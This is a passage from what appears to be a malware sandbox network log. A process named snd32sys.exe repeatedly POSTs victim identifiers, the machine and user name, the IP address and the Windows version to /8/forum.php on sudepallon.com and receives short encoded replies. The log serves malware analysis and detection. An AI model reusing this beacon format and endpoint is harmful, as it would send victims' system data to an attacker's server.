                                                                                                                                                  27192.168.2.34978177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:03.457827091 CEST6054OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:03.525928974 CEST6054INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNJQMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  28192.168.2.34978277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:03.970303059 CEST6055OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:04.037123919 CEST6056INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMTGNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  29192.168.2.34978377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:04.411729097 CEST6056OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:04.479322910 CEST6057INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cZAZAARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  3192.168.2.34975777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:53.509896040 CEST5499OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:53.576370001 CEST5505INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:55 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQKPJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  30192.168.2.34978477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:04.784542084 CEST6057OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:04.851527929 CEST6058INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMKPNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  31192.168.2.34978577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:05.179541111 CEST6059OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:05.246893883 CEST6059INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCNMXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  32192.168.2.34978677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:05.567929029 CEST6060OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:05.634110928 CEST6060INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:07 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cBKPYARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  33192.168.2.34978777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:05.990741968 CEST6061OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:06.056196928 CEST6061INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:07 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cBZAYARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  34192.168.2.34978877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:06.570564985 CEST6062OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:06.643687010 CEST6062INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:08 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQKPJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  35192.168.2.34978977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:07.036962032 CEST6063OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:07.106313944 CEST6063INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:08 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cAQJZARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  36192.168.2.34979077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:07.823514938 CEST6064OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:07.890404940 CEST6065INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:09 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cJMNQARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  37192.168.2.34979177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:08.232155085 CEST6065OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:08.301796913 CEST6066INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:09 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHJQSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  38192.168.2.34979277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:08.911281109 CEST6066OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:08.978708029 CEST6067INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:10 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQZAJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  39192.168.2.34979377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:09.286073923 CEST6068OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:09.355176926 CEST6068INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:10 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHNMSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  4192.168.2.34975877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:53.896061897 CEST5639OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:53.964401007 CEST5688INHTTP/1.1 200 OK
